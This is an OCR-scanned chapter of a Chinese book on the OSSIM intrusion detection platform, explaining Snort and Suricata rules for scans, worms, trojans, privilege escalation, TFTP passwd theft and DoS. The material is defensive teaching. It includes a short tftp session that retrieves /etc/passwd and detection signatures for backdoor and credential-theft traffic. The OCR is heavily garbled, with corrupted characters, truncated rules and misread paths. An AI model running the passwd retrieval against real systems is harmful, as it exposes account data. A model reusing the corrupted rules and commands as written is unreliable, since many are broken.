http://rules.emergingthreats.net/open-nogpl/snort-2.9.0/emerging.rules.tar. 
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下 面 分 几 个 步骤 讲解 如 何 安装 这 个 ET 规则 : 


COD 首先 下 载 、 解 包 。 例 如 解 到 /tmp/rules 目录 中 。 
(2) 备份 旧 的 规则 : 


(3) 将 新 规则 复制 到 下 面目 录 
© #op /tmp/rules/* /ete/smort/rules 0 


(4) 更 新 #OSSIM Server: 


(5) 重 配 置 OSSIM: 


重新 配置 后 ， 新 的 ET 规则 即 可 生效 。 
6.4.6 ”应 用 新 规则 


读者 在 初次 使 用 时 ， 在 系统 /etc/snort/rules/local.rules 加 了 条 规则 ， 为 何不 生效 呢 ? 
比如 使 用 Snort 检测 可 执行 程序 〈.exe) 添加 如 下 规则 ; 


在 /etc/snort/rules/local.rules 中 添加 规则 后 ， 还 需要 执行 如 下 命令 : 


注意 : sid-msg.map 和 gen-msg.map 的 区 别 : 


€ /etc/snor/gen-msg.map: gid 对 应 的 报警 文本 。 
€  /etc/snorUsid-msg.map: sid 对 应 的 报警 文本 ， 包 含 一 个 从 msg 标签 到 snort 规则 ID 的 
映射 。 


注意 ， 最 后 需要 重启 Snort 服务 。 
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6.4.7 ”主动 探测 与 被 动 探测 

现 有 的 网 络 探测 技术 可 以 分 为 两 类 : 主动 探测 和 被 动 探测 。 主动 探测 通过 主动 扫描 来 检查 
监听 服务 的 存在 ， 其 优点 是 扫描 快速 和 结果 完整 ， 它 的 缺点 是 具有 攻击 性 质 (大 规模 的 并 行 高 
速 扫描 会 对 系统 和 网 络 造成 的 严重 影响 )， 易 暴露 ， 易 受 防 火 墙 影响 ， 只 能 提供 网 络 当前 的 快 
照 ， 当 然 网 络 组 成 或 结构 发 生变 化 需要 重新 扫描 。 例 如 Nmap 工具 就 是 主动 探测 工具 。 

被 动 探 测 一 般 通 过 网 络 嗅 探 来 提取 服务 端的 相关 信息 , 被 动 探测 结果 不 会 受 防火 墙 影响 , 而且 
被 动 探测 完全 没有 入 侵 性 。 被 动 探测 的 缺点 是 检测 的 服务 不 能 及 时 发 现 , 某 些 网 络 服务 可 能 要 花 数 
天 时 间 才 能 发 现 , 例如 arpwatch MAC 地 址 异常 检测 ) pOf (被 动 OS 检测 )、pads (服务 异常 检测 》 
等 属于 被 动 检测 工具 ， 它 们 在 OSSIM 3.1 中 都 能 找到 ， 稍 后 在 第 8 章 将 深入 研究 。 


可 疑 流量 检测 技术 


在 网 络 流量 分 析 中 ， 较 为 有 效 的 检测 是 基于 特征 码 的 检测 ， 因 为 恶意 流量 (如 病毒 、 僵 尸 
网 络 、 木 马 、 蠕 虫 、Rootkit 等 ) 在 构造 和 内 容 上 都 不 同 于 正常 流量 ， 所 以 我 们 可 以 创建 攻击 
特征 来 进行 比 对 检测 。 


6.5.4 通过 特征 检测 

以 OSSIM 系统 中 的 Snort 为 例 一 个 恶意 流量 的 特征 可 以 被 创建 成 一 个 规则 而 载 入 Snort 
检测 引擎 (负责 特征 匹配 )。 我 们 回顾 一 下 ，Snort 是 如 何 对 规则 进行 处 理 ， 重 点 要 了 解 Snort 
检测 引擎 如 何 工作 ， 下 面 看 个 例子 : 

alert icmp $EXTERNAL_NET any -> $HOME_NET any (msg:"ICMP PING 
NMAP";dsize:0;type:8;) 

该 规则 表示 : SETTORE ELITS ER. ARREO Aus JF B. ICMP 类 型 值 为 8 的 ICMP 流 
量 产 生 报 警 。 

为 了 便于 大 家 理解 ， 这 里 假设 一 个 场景 : 攻击 者 利用 Nmap 工具 对 一 个 网 段 进 行 扫描 ， 这 
里 利用 nmap ping 的 一 个 特点 ， 它 将 ICMP 类 型 域 值 设 定 为 8， 并 且 有 效 载荷 为 空 。 攻 击 者 发 
送 这 样 的 数据 包 ， 发 现 了 该 网 段 存活 的 主机 ， 进 而 再 对 其 进行 更 深入 的 扫描 。 


由 于 Snort 监控 的 端口 在 交换 机 上 做 了 端口 镜像 ， | 
[ 录 下 来 。 


6.5.2 ”检测 可 疑 的 载荷 
Snort 特征 并 不 只 是 检测 IP 包头 的 数据 ， 还 能 进行 深度 检测 。 我们 需要 检测 隐藏 在 一 个 看 
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似 正常 封包 中 的 可 疑 载荷 ， 例 如 : 在 OSSIM 4 系统 中 ， 打 开 /etc/snort/rules/deleted.rules 文件 ， 
查看 第 5807 行 的 规则 ， 如 图 6-25 所 示 。 


807 alert tcp $EXTERNAL 
s" i 


flou:e 


2 J E slit 
100IP1001C100 00 90 001 e.connect.ipc: 


alert; classtupe:protoco1-cal 


ode id:538; reu:17: 
图 6-25 一段 snort 规则 
这 条 规则 的 含义 为 ， 对 任何 一 个 净 载 荷 中 含有 “II00|PI00|CI00 24 00 00 00”, J HALK 
明 是 从 外 部 网 络 发 给 运行 SMB (Server Message Block) 服务 的 计算 机 的 TCP 流量 产生 报警 。 
在 检测 中 发 现 ，sid=538 所 占 比 例 比较 大 ， 这 种 净 载 荷 可 能 会 引起 Windows 系统 缓冲 区 溢出 ， 
最 终 机 器 月 溃 。 只 有 这 种 净 载 荷 是 从 外 部 发 给 运行 NETBIOS (TCP139 端口 ) 的 计算 机 时 ， 
才 需 要 注意 这 一 规则 。 


e SMB 协议 基于 TCP-NETBIOS, NetBIOS 相关 的 端口 分 别 是 : 137. 138. 139. Xp, 137 
端口 表示 NETBIOS Name Service, 138 端口 表示 NETBIOS Datagram Service, 139 端口 表 
示 NETBIOS Session Service。 


6.5.3 ”检测 具体 元 素 
从 系统 性 能 上 考虑 ，Snort 特征 可 以 具体 针对 特殊 协议 的 某 一 个 元 素描 述 进行 检测 ， 下 面 
查看 /etc/snort/rules/web-iis.rules 文件 中 第 136 行内 容 ， 如 图 6-26 所 示 。 

136 alert tcp $EXTERNAL_NET > SHTTP_SERVERS SHTTP_PORTS (msg:"WEB-IIS ISAPI .ida attempt”; flou 


:to seruer,established; content:".ida?"; fast pattern; nocase; http uri; metadata :service http; 
reference ^: reference: ,1065; reference ,2000-0071; reference ,2001-050| 


0; classtype :vueb-application-attack; sid:1243; rev:19;) 


图 6-26 删除 snort 规则 


该 规则 代表 对 任何 一 个 来 自 外 部 网 络 发 往 本 地 Web 服务 器 ， 并 且 URL 中 包含 “.ida?” 的 
网 络 流量 产生 报警 。 

Microsoft IIS .IDA / .IDQ ISAPI 扩展 远程 路 径 泄露 漏洞 出 现在 Windows NT/2000 的 系统 
中 ， 是 个 古老 的 漏洞 了 。.ida 扩展 名 是 Windows NT/2000 系统 索引 服务 的 组 件 ， 通 过 IS 
的 ,ida、.idq 映射 可 以 使 用 Index Server 检索 ，IIS 对 于 不 存在 的 .ida、.idq、 文 件 的 访问 请 求 没 
有 很 好 地 处 理 。 可 能 导致 WEB 服务 器 泄露 网 站 文件 的 绝对 路 径 。 

比如 ， 对 于 未 修复 MS01-033 补丁 的 一 台 Windows 2000 Server IIS 服务 器 ， 就 会 遭受 
CodeRed.F( 红 色 代 码 ) 病 毒 的 攻击 , 并 向 其 他 未 打 补 丁 的 机 器 传播 , 具体 现象 是 发 出 大 量 “GET 
/default.ida?XXXX” 请 求 ， 那 么 这 种 含有 .ida 的 流量 就 会 被 Snort 发 现 并 报警 。 对 于 这 类 漏洞 ， 
最 新 的 Windows 系统 已 消除 。 
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6.5.4 OSSIM 中 的 Snort 规则 与 SPADE 检测 

在 OSSIM 系统 里 的 Snort 软件 集成 了 大 约 9000 种 规则 ,看 似 覆 盖 面 很 广 , 但 这 是 通用 规 
则 ， 有 很 多 规则 需要 根据 网 络 情况 进行 “私人 定制 ” OSSIM 平台 提供 了 二 次 开发 的 环境 ， 所 
有 规则 都 可 以 增 、 删 、 改 。 

OSSIM 3 系统 中 提供 了 SPADE (Statistics Packet Anomaly Detect Engine， 统 计 包 异常 检测 
引擎 )， 异 常 检测 的 手段 可 通过 Arpwatch 检测 MAC spoofing， 通 过 POF 检测 操作 系统 变化 ， 
通过 Pads 和 Nmap 检测 新 增 网 络 服务 ， 用 它 还 可 以 检测 无 匹配 特征 的 一 些 可 疑 流量 。 具 体 原 
理 是 ，SPADE 观测 网 络 流量 ， 并 建议 一 张 描述 网 络 正 常 时 的 流量 表 作 为 基准 。OSSIM 发 展 到 
5.x 版 后 用 prads 代替 原先 arpwatch 和 pads 的 功能 。 

这 张 表 记载 的 数据 包 的 类 型 、 源 地 址 、 目 的 地 址 ， 当 达到 一 定 大 小 后 ，SPADE 挑 出 每 个 
包 将 被 赋值 ， 该 数值 的 大 小 取决 它 在 表 中 出 现 的 频率 ， 频 率 越 高 ， 该 值 越 小 。 当 该 数值 达到 某 

-配置 阔 值 时 ， 就 会 产生 报警 。 

这 种 方法 对 于 检测 黑客 的 异常 行为 非常 奏效 , 有些 攻 击 者 会 缓慢 地 扫描 服务 器 端口 , 企图 
把 自己 的 扫描 数据 , 济 没 在 大 量 合法 数据 包 中 ,以 达到 隐蔽 目的 ， 即 使 是 使 用 了 多 个 源 地 址 进 
行 活动 ， 也 会 被 SPADE 察觉 。 又 如 ， 假 定 我 们 使 用 SPADE 功能 保护 一 台 WEB 服务 器 。 首 先 
我 们 把 Web 服务 器 所 有 流量 镜像 到 交换 机 SPAN 口 ,我 们 的 OSSIM 系统 在 哪里 进行 监听 呢 ? 

SPADE 为 进入 服务 器 的 流量 建立 一 张 表 ， 这 些 流 量 大 部 分 是 对 80 和 443 端口 的 TCP 链 
接 ， 建 立 后 ， 对 80 和 443 端口 的 TCP 请 求 就 是 正常 流量 ， 这 时 会 被 赋予 一 个 较 低 的 数值 。 如 
果 这 时 攻击 者 想 要 查 明 该 服务 器 有 哪些 开放 端口 , SPADE 就 会 给 这 些 流量 赋予 一 个 较 高 的 值 ， 
因为 它 对 于 这 人 台 服 务 器 是 比较 少见 的 。 此 时 ， 如 果 该 值 超过 了 事先 定义 好 的 阔 值 ， 系 统 就 会 发 
出 报警 。 


6.5.5 ”恶意 代码 行为 特征 分 析 

随 着 恶意 代码 技术 的 发 展 , 涌现 出 了 各 种 恶意 代码 分 析 技术 。 当 前 主流 的 恶意 代码 分 析 技 
术 是 静态 分 析 等 技术 ， 分 析 的 目的 就 是 依靠 工具 找到 特征 码 。 

比如 , 在 2004 年 3 月 发 现 的 一 种 蠕虫 , 名 叫 W32.Netsky.P@mm, 它 是 一 种 群发 邮件 蠕虫 ， 
它 使 用 自己 的 SMTP 引擎 将 自己 发 送 到 在 扫描 硬盘 和 映射 的 驱动 器 时 找到 的 电子 邮箱 。 此 里 
虫 还 试图 利用 各 种 文件 共享 程序 、 通 过 将 自己 复制 到 各 个 共享 文件 夹 进行 传播 , 在 一 台 受 感染 


当 我 们 找到 蠕虫 特征 码 以 后 就 很 容易 写 出 检测 规则 ， 详 情 如 下 : 


alert tcp $EXTERNAL_NET any -> any any (msg:"W32.NetSky.p@mm - SMB";content:"|4E 
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EB 87 89 77 7E E0 83 B1 94 94 CC E9 F5 97 97 53 95 5C 95 AF C6 40 C5 CA AC 25 8E 
47 F1 5D OE|"); classtype:misc-activity;rev:1;) 


6.5.6 EE 

对 于 蠕虫 样本 的 提取 ， 主 要 采用 的 方式 是 基于 蜜 包 系 统 捕获 。 在 这 种 可 控 的 模拟 环境 中 ， 
可 以 消耗 黑客 精力 ， 并 记录 黑客 来 源 和 犯罪 证 据 。 另 外 ，IDS 的 特征 库 需要 不 断 地 更 新 ， 才 能 
检测 到 新 的 攻击 行为 。 

蜜 钢 系 统 将 记录 到 的 入 侵 信 息 传递 给 入 侵 检测 系统 , 入 侵 检测 系统 收 到 事件 信息 后 , 对 其 
进行 分 析 并 提取 攻击 特征 , 最 后 将 新 的 攻击 特征 添加 到 系统 的 攻击 特征 库 中 , 从 而 使 得 入 侵 检 
测 系 统 可 以 检测 出 未 知 的 攻击 手段 。 利用 蜜 钢 系 统 与 入 侵 检测 系统 的 联动 , 可 以 增强 入 侵 检测 
系统 对 网 络 的 防御 能 力 ， 这 个 系统 的 架构 如 图 6-28 所 示 。 


6-28 ”虚拟 密 铅 架构 图 


OSSIM 系统 中 的 Snort 软件 支持 对 报警 定制 ， 并 支持 优先 级 。 可 以 根据 需要 添加 许多 自 定 
义 的 报警 分 类 。 就 像 特征 码 一 样 ， 报 警 分 类 也 是 通过 规则 来 定义 。 比 如 ， 一 个 针对 特洛伊 木马 
流量 的 报警 分 类 如 下 : 


config classification:trojan-activity . A Network Trojan was detected 


大 家 可 以 参考 /etc/suricata/rules/emerging-trojan.rules 规则 文件 第 3212 fT: 


alert tcp $EXTERNAL NET any -> $HOME_NET any (msg:"ET TROJAN Chorns/Poison Ivy 
related Backdoor Ini tial Connection"; flow:established; dsize:12; 
content:"/FIRSTINF/|0d0a|"; reference:url,doc.emergin gthreats.net/2010344; 
classtype:trojan-activity; sid:2010344; rev:3;) 
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该 分 类 针对 所 有 已 检测 到 的 特洛伊 木马 行为 ， 包 括 Netbus、Subseven 等 。 这 一 规则 规定 
将 严重 的 定义 为 1， 可 以 增加 这 个 值 来 降低 严重 级 别 。 比 如 ， 在 特征 规则 中 ，Subsenven 特征 
中 就 带 有 trojan-activity 来 表示 ， 这 样 的 例子 还 包括 /etc/suricata/rules/emerging_pro-trojan.rules 
规则 文件 的 第 12255 行 : 

alert http $HOME_NET any -> SEXTERNRL NET any (msg:"ETPRO TROJAN 

Trojan.SubSeven.215-srv reporting via ICQ WWW script"; flow:established,to server; 
content:"/scripts /WWPMsg.dll?from-"; http uri; content:" (Win95|3b|"; 
fast pattern; http user agent; content:"&subject-Pager&body-"; http uri; 


reference:md5,68fac0fc380614f4eb08c8485e a876c4; classtype:trojan-activity; 
sid:2805959; rev:4;) 


设 忽略 subseven 的 影响 ， 那 么 可 以 通过 降低 优先 级 的 方法 解决 ， 实 现 起 来 很 简单 ， 

"s CARARE priority:2. 

还 是 接着 上 面 的 例子 修改 内 容 为 : 

alert http $HOME NET any -> $EXTERNAL NET any (msg:"ETPRO TROJAN 
Trojan.SubSeven.215-srv reporting via ICQ WWW script"; flow:established,to server; 
content:"/scripts /WWPMsg.dll?from-"; http uri; content:" (Win95|3b|"; 
fast pattern; http user agent; content:"&subject-Pager&body-"; http uri; 
reference:md5,68fac0fc380614f4eb08c8485e a876c4; priority:2; sid:2805959; 
rev:4;) 


最 终 通过 这 种 方法 可 以 使 报警 级 别 达到 最 合理 的 状况 。 


Snort 规则 进 阶 


前 面 几 节 介 绍 了 Snort 规则 基础 ， 下 面 讲 解 Snort 规则 集 的 另外 一 些 实用 功能 。 


6.6.1 ”可疑 流量 的 报警 

假设 idm 在 内 网 中 , 用 Snort 监控 的 VLAN 中 的 网 络 交换 机 ， 通 过 Telnet 来 管理 它 
们 。 在 这 种 情况 下 ， 这 条 Snort 规则 所 发 出 的 警报 就 算是 正常 。 

我 们 打开 OSSIM 系统 中 /etc/suricata/rules/emerging-telnet.rules 配置 文件 ， 查 看 第 53 fr. 
如 图 6-29 所 示 。 


EXTERNAL. NET 


图 6-29 snort 规则 
如 果 把 这 条 规则 用 在 了 监控 一 个 受 禁止 使 用 Telnet 进行 访问 的 防火 墙 上 ， 那 么 它 发 出 的 报警 
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就 非常 重要 ， 应 该 引起 管理 员 的 注意 。 就 是 说 一 定 要 注意 产生 报警 的 具体 环境 ， 而 不 能 一 概 而 论 。 
下 面 再 看 个 例子 ，Web 中 的 一 些 敏 感 资源 不 让 访问 ， 若 有 人 尝试 访问 Web 服务 器 所 禁止 
访问 的 资源 时 ， 就 会 由 下 面 这 条 规则 所 触发 报警 。 
打开 emerging-misc.rules 配置 文件 ， 查 看 第 85 行 ， 如 图 6-30 所 示 。 


TERNAL_NET -> $HOME_NET 
content : "Cor 


Æ 6-30 snort 规则 


6.6.2 ” 空 会 话 攻击 漏洞 报警 

早 在 Windows 2000 系统 时 ， 曾 发 现 空 会 话 攻 击 漏洞 (当然 现在 Windows 7/8 imis 
除 此 问题 )， 攻 击 者 可 以 很 轻松 地 利用 空 会话 完 成 攻击 ， 通 过 在 主机 上 面 建立 一 个 空 会 话 ， 轨 
图 6-31 所 示 ， Pan Enum 枚 举 共 享 等 方式 ， 攻 击 者 可 能 会 获得 一 个 重 命名 管理 pet 
这 是 因为 这 个 空 会 话 会 加 载 到 所 有 该 计算 机 账户 组 中 。 它 使 得 不 在 域 中 的 主机 也 能 使 用 该 主机 
所 使 用 的 网 络 xw. 


图 6-31 建立 空 会 话 
图 6-31 使 用 Net 命令 发 起 的 成 功 空 会 话 连接 ， 当 使 用 Snort 监控 这 些 主机 时 ， 如 有 人 再 
利用 这 种 方式 攻击 ， 就 会 立刻 暴露 出 来 。 在 OSSIM 系统 中 ， 先 打开 emerging-netbios.rules 文 
件 ， 查 看 294 行 ，Netbios Null 会 话 的 规则 如 图 6-32 所 示 : 
294 alert tcp $EXTERNAL_NET $HOME_NET msg: NETBI NT ! 
3blished; :"|00 OC Io0lil j [rn 


TOINI ITIO 


referenc 


图 6-32 snort 规则 


当 攻 击 者 企图 通过 匿名 方式 ， 连 接 枚 举 用 户 或 其 他 系统 信息 时 ， 该 规则 将 会 被 触发 。 


6.6.3 ”用 户 权限 获取 

拥有 权限 使 用 一 个 普通 用 户 账号 的 攻击 者 ， 可 以 利用 系统 的 各 种 漏洞 来 提升 自己 的 权限 ， 
直到 获取 系统 最 高 权限 。 比 如 ， 可 以 通过 修改 .rhosts 文件 来 获取 全 局 访问 权限 。 下 面 是 Snort 
规则 检测 用 户 权 限 获 取 的 企图 行为 : 打开 emerging-misc.rules, frfi 139 行 ， 如 图 6-33 所 示 。 


图 6-33 snort 规则 


在 实际 应 用 中 , 提 权 的 目标 很 可 能 是 数据 库 ， 用 户 可 以 访问 一 种 类 型 的 数据 ,但 希望 访问 
其 他 受 限制 的 资源 ， 另 外 ， 如 果 用 户 获得 超级 用 户 权 限 ， 它 就 可 以 控制 主机 。 在 Snort 中 监控 
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这 种 用 户 提 权 的 例子 是 Microsoft SQL Server 的 xp cmd shell 规则 , 打开 emerging-exploit.rules, 
查看 931 行 ， 如 图 6-34 所 示 。 


图 6-34 snort 规则 


Xp_cmdshell 可 以 用 于 执行 SQL Server 的 系统 命令 。 攻 击 者 可 使 用 xp_cmdshell 安装 木马 
或 执行 可 以 在 Windows 命令 行 下 执行 的 任何 程序 ， 该 规则 就 能 检测 这 种 攻击 行为 。 


6.6.4 ”失败 的 权限 提升 报警 规则 

攻击 者 提升 用 户 权限 也 不 是 一 帆 风 顺 ， 在 提 权 过 程 中 ， 失 败 的 登录 行为 就 会 触发 系统 大 
量 报警 ， 这 样 攻击 者 的 行为 就 会 被 发 现 。 又 如 PCAnywhere 失败 登录 规则 就 是 一 个 用 户 权限 获 
取 的 例子 ， 我 们 打开 emerging-policy.rules 文件 ， 查 看 1706 行 ， 如 图 6-35 所 示 。 


$EXTERNAL_NET 


图 6-35 snort 规 则 


该 规则 用 于 检测 登录 PCAnywhere 失败 的 尝试 。 


6.6.5 ”企图 获取 管理 员 权限 

如 果 攻 击 者 可 以 访问 Windows 系统 里 的 Admin$ 共 享 资 源 ， 它 就 可 以 访问 Windows 系统 
目录 (cwinnt)， 但 这 么 做 的 人 ， 并 不 是 真正 的 管理 员 ， 怎 么 发 现 问题 呢 ? 下 面 这 条 规则 就 
可 以 检测 这 种 行为 ， 打 开 emerging-netbios.rules 文件 ， 查 看 第 303 行 ， 如 图 6-36 所 示 。 


$HOME_NET 


id: 


图 6-36  snort 规则 


6.6.6 成 功 获取 管理 员 权 限 

Unix 系统 的 passwd 文件 是 不 能 在 TFTP 这 样 不 安全 协议 上 传送 的 ，TFTP 协议 既 不 需要 
认证 ， 也 不 加 密 ， 极 度 危 险 。 所 以 在 老式 Unix 系统 中 ， 可 以 通过 下 面 方式 获取 passwd: 

Er 

tftp»connect 1.1.1.1 

tftp»get /etc/passwd /tmp/passwd.cracker 

tftp»quit 

通过 Snort 就 能 检测 到 这 种 攻击 ， 下 面 这 条 是 通过 TFTP 传输 passwd 文件 的 行为 。 

打开 emerging-tftp.rules， 查 看 89 行规 则 ， 如 图 6-37 所 示 。 
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89 alert udp any -> any 69 (msg:"GPL TFTP GET passud"; content:"100 011"; depth:2; content:"pas 


sud"; offset:2; nocase; classtype:successful-admin; sid:2101443; rev:5;) 


图 6-37 snort 规则 
这 条 规则 的 报警 就 可 以 表示 攻击 者 获得 了 对 根 用 户 和 其 他 用 户 的 控制 权 。 类 似 这 样 的 例子 
还 有 用 于 检测 BSD Telnet 守护 进程 攻击 的 规则 。 打 开 OSSIM 2.3 系统 中 Snort 规则 库 的 
telnet.rules 文件 ， 查 看 第 38 行 ， 如 图 6-38 所 示 。 


图 6-38 snort 规则 


6.6.7 ”拒绝 服务 


再 举 一 个 “发 现 Chargen/echo DOS 攻击 ”的 例子 ，chargen 服务 端口 为 UDP 19，echo 为 
UDP 7， 如 果 UDP chargen server 收 到 一 个 封包 后 ， 就 发 回 一 个 封包 ， 如 果 发 现 与 客户 端 连 接 
存在 ， 会 不 断 发 送 封包 ， 被 利用 为 Ddos 攻击 后 ， 这 样 攻击 就 会 被 放大 ， 以 致 占 满 整个 网 络 带 
宽 。 这 里 攻击 者 伪造 了 数据 包 ， 将 两 台 开 放 Chargen/echo 的 服务 器 互 指 ， 如 图 6-39 所 示 ， 这 
样 结果 造成 资源 耗 尽 而 导致 网 络 不 可 用 。 


Echo "response" to Server B 


mi 


图 6-39 拒绝 服务 攻击 的 例子 
打开 dos.rules 的 第 1 行 ， 如 图 6-40 所 示 。 


UDP echo*chargen bonb flow:to seruer; reference:cue, 1999-0103; 


attenpted-dos: 1; rev:9;) 


图 6-40 dos 规则 


该 特征 检测 的 DOS 条 件 是 一 个 Chargen/echo 服务 的 无 限 循 环 。 还 有 一 些 DOS 攻击 会 出 现 异 
常 的 数据 输入 , 这 些 输入 的 内 容 会 使 服务 器 瘫痪 , 当然 , 这 是 个 比较 老 的 漏洞 。 Microsoft FTP STAT 
globbing DOS 就 是 一 个 典型 , 当 攻击 者 在 Windows 2000 IIS 5.0 的 FTP 服务 器 上 发 送 STAT 命令 之 
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后 ， 再 追加 一 些 异 常 的 文件 名 匹配 字符 〈$g.*? 等 ) 时 ， 这 时 没有 打 补丁 的 FTP 服务 器 将 会 立即 崩 
溃 。 我 们 看 看 Snort 应 对 此 种 攻击 的 规则 代码 ， 打 开 ftp.rules 规则 ， 查 看 66 行 ， 如 图 6-41 所 示 。 


STAT * do: 


ontent : "STAT 
- 44t 


:13;) 
图 6-41 snort 规则 


DDOS 攻击 利用 大 量 的 受害 主机 向 目标 主机 发 送 大 量 请 求 ， 造 成 其 瘫痪 。 这 种 行为 也 可 以 
用 Snort 规则 来 检测 。 以 下 是 在 受到 DDOS 攻击 时 ， 在 ACID 系统 里 发 出 的 事件 报警 信息 。 


#(2 - 10994) [2012-08-21 09:58:06] [arachNIDS/253] DDOS shaft synflood 
IPv4: 195.27.218.62 -» 123.xxx.yyy.252 
hlen-5 TOS=0 dlen-40 ID-28789 flags-0 offset-0 TTL-19 chksum-17659 
TCP: port-13000 -> dport: 13000 flags-******S* seq-674711609 
ack-39679596 off-5 res-0 win-25622 urp-39897 chksum-44744 
Payload: none 
#(2 - 10993) [2012-08-21 09:58:06] [arachNIDS/253] DDOS shaft synflood 
IPv4; 195.27.218.62 => 123.xxx.yyy.250 
hlen-5 TOS-0 dlen-40 ID-28789 flags-0 offset-0 TTL-19 chksum-17661 
TCP: port-13000 -» dport: 13000 flags-******S* seq-674711609 
ack=1883199726 off-5 res-0 win-20738 urp-46580 chksum-22367 
Payload: none 


以 下 是 Snort 得 到 的 数据 包 分 析 。 


Snort: 

一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 
08/21-09:37:16.080331 195.27.218.62:13000 -> 12.82.128.178:13000 
TCP TTL:16 TOS:0x0 ID:39977 IpLen:20 DgmLen:40 DF 

******S* Seq: 0x28374839 Ack: 0x26917D08 Win: 0x2240 TcpLen: 20 
一 十 = 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 一 十 
Snort processed 1 packets. 

Breakdown by protocol: 

Action Stats: 


TCP: 1 (100.000%) ALERTS: 0 
UDP: 0 (0.000%) LOGGED: 0 
ICMP: 0 (0.000%) PASSED: 0 
ARP: 0 (0.000%) 
IPv6: 0 (0.000%) 


原本 发 起 一 个 序列 号 为 SYN 4 674711609， 将 产生 一 个 SYN/ACK 674711610 或 者 ACK 
674711610， 也 许 是 程序 员 下 忽 ， 当 实际 情况 是 发 起 一 个 SYN 包 ， 它 们 为 每 个 数据 包 使 用 了 相 
同 的 TCP 序列 号 。 所 以 简单 地 通过 检测 674711609 的 序列 号 ， 就 能 检测 这 种 攻击 ， 另 外 ， 还 
会 发 现 序 列 号 变 成 了 0x28374839， 为 什么 ?其 实 十 进 制 的 674711609， 表 示 为 十 六 进 制 为 
0x28374839。 接 下 来 我 们 来 看 看 Snort 规则 如 何 防范 这 种 攻击 规则 比较 简单 ,打开 deleted.rules 
的 第 105 行 ， 如 图 6-42 所 示 。 
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105 alert tcp $ SEXTERNAL NET 


flags:S,12; si 4711609; reference: 
) 


图 6-42 Deleted 部 分 规则 


高 速 网 络 环境 的 应 用 
在 高 速 复杂 的 网 络 环境 下 ，CPU 处 于 频繁 中 断 状态 ， 造 成 接收 数据 包 效 率 降低 。 假 想 一 个 场 
景 ,我 们 使 用 标准 100MB 网 卡 ,实际 达到 的 接收 速率 为 80Mbits/s, 当 数 据 包 最 大 长 度 为 1500Bytes， 
CPU 每 秒 产生 中 断 数 目 为 6,667 个 ， 当 数据 包 最 短 长 度 达 到 46Bytes，CPU 每 秒 产 生 中 断 数 目 暴 
涨 到 217,391， 是 原来 的 32 倍 。 数 据 包 从 网 卡 驱动 到 内 核 驱动 ， 再 从 内 核 到 用 户 空 间 数据 包 被 多 
次 复制 ， 浪 费 了 CPU 的 大 量 时 间 和 资源 。 在 64 位 OSSIM 中 采用 PF. ring 技术 , 减少 了 数据 包 在 
内 存 复 制 次 数 ， 彻 底 解决 了 这 个 问题 ， 所 以 目前 64 位 OSSIM 5 能 用 在 千 兆 网 络 环境 中 。 


6.7.1 Suricata VS Snort 

多 年 来 Snort 已 成 为 普遍 使 用 的 轻 量 级 开源 入 侵 检测 系统 ,但 随 着 多 核 及 高 速 带 宽 时 代 的 
来 临 ， 单 线程 的 Snort 已 不 能 满足 人 们 的 需要 。 随 着 告警 事件 数量 的 增加 ， 队 列 会 越 来 越 大 ， 
索引 深度 增加 ， 找 到 未 处 理 的 记录 速度 随 之 变 慢 ， 直 到 Suricata 的 出 现 改 变 了 这 一 切 ， 表 6-11 
的 内 容 简单 对 比 了 Suricata 和 Snort 的 主要 差异 。 


表 6-11 Suricata 与 Snort 主要 区 别 


Suricata Snort 
1 Threats rules 
ET 
IPv6 支持 默认 不 支持 ， 编 译 时 需要 加 入 “--enable-ipv6” 选 项 
[ma 方式 [pF ring Libpcap 
[mor 。 | 支持 
| 前 端 |Sguil. BASE, Snortsnarf. 


如 果 你 需要 了 解 当 前 系统 Suricata 的 配置 情况 可 使 用 如 下 命令 : 


#suricata --build-info 


6.7.2 PF ring 工作 模式 
PF ring 是 一 种 新 型 的 网 络 Socket, 性 能 优 于 Libpcap， 它 可 以 提高 包 捕获 的 速度 。PF_ring 
有 三 种 透明 模式 Ctransparent mode) : 


€ 0:0 模式 : 走 的 是 Linux 标准 的 NAPI (New API) 包 处 理 流程 ， 我 们 在 OSSIM Fir 
入 “ethtool -ieth0”， 能 查看 到 NAPI 版 本 号 ( 目前 版 本 : 7.3.21-k5) 。 
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€ 1:1 模式 : 数据 包 即 走 Linux 标准 包 处 理 流程 ， 还 复制 一 份 给 pf ring. 
© 2:2 模式 : 驱动 只 将 包 复 制 到 pf ring， 内 核 则 不 会 接收 这 些 包 。 
1 和 2 模式 需要 特殊 网 卡 驱动 的 支持 ， 一 般 PF_ring 为 0 模式 。/etc/modprobe.d/pfring.conf 


这 个 配置 文件 中 设置 了 工作 模式 为 0, prng 模块 位 于 
/lib/modules/2.6.32-5-amd64/kernel/net/pf ring/ 目 录 。 


得 .号 ”网 络 异常 行为 分 析 

普通 的 流量 监控 软件 很 难 感知 到 网 络 异常 行为 ,这 也 是 运 维 人 员 在 监控 领域 的 一 块 短 板 。 
所 谓 异 常 行为 主要 指 通 过 计算 机 和 互联 网 ,对 网 络 中 的 各 种 设备 上 的 原始 数据 进行 恶意 的 操作 
(增加 、 删 除 、 查 询 和 修改 )， 从 而 达到 破坏 操作 系统 功能 ， 或 者 对 用 户 有 危害 的 行为 活动 。 
例如 ， 目 前 最 为 常见 的 网 络 异 常 行 为 ， 主 要 包括 木马 病毒 、 黑 客 攻击 、 恶 意 软 件 的 一 系列 行为 
等 。 这 些 异常 行为 都 会 对 用 户 的 网 上 活动 造成 一 定 的 影响 ， 甚 至 导致 网 络 瘫痪 。 


6.8.1 流程 分 析 

行为 特征 提取 模块 流程 : 首先 是 链 路 层 协议 分 析 ， 并 由 链 路 层 向 高 层 递 进 ,如果 提取 到 各 
层 协 议 的 特征 就 结束 提取 。 下 面 举 一 个 应 用 层 HTTP 协议 跨 站 脚本 攻击 的 例子 , 来 分 析 这 个 模 
块 的 流程 ， 如 图 6-43 所 示 。 


开始 采集 


链 路 层 协议 分 析 


网 络 层 协议 分 析 
22d 


UPD 应 用 层 协议 
分 析 特 征 码 提取 


6-43 行为 特征 提取 流程 
